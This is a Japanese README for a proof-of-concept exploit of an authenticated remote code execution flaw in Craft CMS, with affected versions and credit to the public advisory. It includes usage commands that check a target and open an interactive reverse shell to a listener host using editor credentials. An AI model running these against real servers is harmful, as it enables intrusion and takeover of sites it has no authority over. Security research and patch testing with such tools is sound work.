
認証済みCraft CMS RCEのPoC(CVE-2026-44011)
この Python スクリプトは、Craft CMS セキュリティアドバイザリで説明されている攻撃を応用したものです。認証済みの Craft ユーザーは、脆弱なフィールドレイアウト設定パスに到達し、サーバーにコマンドを実行させることができます。
影響を受けるバージョンは Craft CMS >=4.0.0, <4.17.12 および >=5.0.0, <5.9.18 です。
このスクリプトは両方のホストで curl を必要とします。サーバー上では Bash を使用します。サーバー上の Python3 も対話型 PTY を提供しますが、これがない場合、シェルは基本的な接続にフォールバックします。
# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check
# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'
Craft CMS は @precicom-vincent-tl を CVE-2026-44011 の発見者としてクレジットしています。脆弱性の詳細とペイロード例は Craft CMS アドバイザリ GHSA-qrgm-p9w5-rrfw で公開されています。このスクリプトは、その公開された手法を応用したものです。